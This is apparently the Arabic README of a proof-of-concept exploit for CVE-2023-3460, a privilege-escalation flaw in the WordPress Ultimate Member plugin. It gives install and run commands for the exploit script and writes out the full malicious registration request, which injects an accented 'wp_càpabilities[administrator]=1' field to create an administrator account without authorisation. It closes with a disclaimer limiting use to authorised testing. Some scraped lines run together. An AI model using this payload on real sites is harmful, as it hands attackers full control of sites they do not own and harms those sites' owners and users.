
استغلال إثبات المفهوم لـ CVE-2023-3460، وهي ثغرة تصعيد الصلاحيات في إضافة WordPress Ultimate Member. ينشئ حساب مسؤول عبر طلب تسجيل مخصص. للاختبار المصرح به فقط.
هذا استغلال إثبات المفهوم (PoC) لـ CVE-2023-3460، وهو ثغرة أمنية خطيرة في إضافة ووردبريس Ultimate Member. تسمح هذه الثغرة للمستخدمين غير المصادق عليهم بتصعيد صلاحياتهم إلى مدير عن طريق إنشاء طلب تسجيل خبيث.
🔥 التأثير: اختراق كامل للموقع من خلال إنشاء حساب مدير غير مصرح به.
requestsurllib3beautifulsoup4تثبيت المتطلبات:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) من صفحة التسجيلwp_capabilities مع دور administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
تم توفير هذا السكريبت لأغراض تعليمية واختبار مصرح به فقط. الاستغلال غير المصرح به للأنظمة غير قانوني وغير أخلاقي. استخدمه فقط على الأنظمة التي تملكها أو لديك إذن لاختبارها.